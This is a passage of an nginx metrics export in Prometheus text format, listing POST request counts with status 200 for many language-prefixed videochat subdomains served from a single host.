17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="he.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hi.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.date"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.mx"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.show"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hr.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ht.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.date"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="hu.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="id.videochat.world"} 68 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.tv.br"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="is.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.date"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="it.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.tv.br"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jp.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.tv.br"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="jv.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ka.videochat.world"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.mx"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kk.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.tv.br"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="km.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="kn.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.date"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ko.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.tv.br"} 101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ky.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.mx"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lb.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lo.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.tv.br"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lt.videochat.world"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.date"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="lv.videochat.world"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.tv.br"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mg.videochat.world"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.tv.br"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mi.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mk.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ml.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mn.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mr.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.mx"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.tv.br"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mrj.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ms.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.mx"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.tv.br"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="mt.videochat.world"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="my.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.mx"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ne.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.mx"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="nl.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.mx"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="no.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.tv.br"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pa.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.mx"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.tv.br"} 89 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pap.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.cafe"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pl.videochat.world"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.cafe"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.date"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.mx"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="pt.videochat.world"} 1579 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.tv.br"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ro.videochat.world"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.mx"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sco.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.tv.br"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="si.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sk.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.cafe"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sl.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.date"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.tv.br"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sr.videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="su.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.date"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sv.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.tv.br"} 66 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="sw.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="ta.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="te.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.mx"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tg.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="th.videochat.world"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.date"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tl.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.tv.br"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tr.videochat.world"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.show"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="200",vhost="tt.videochat.world"} 10 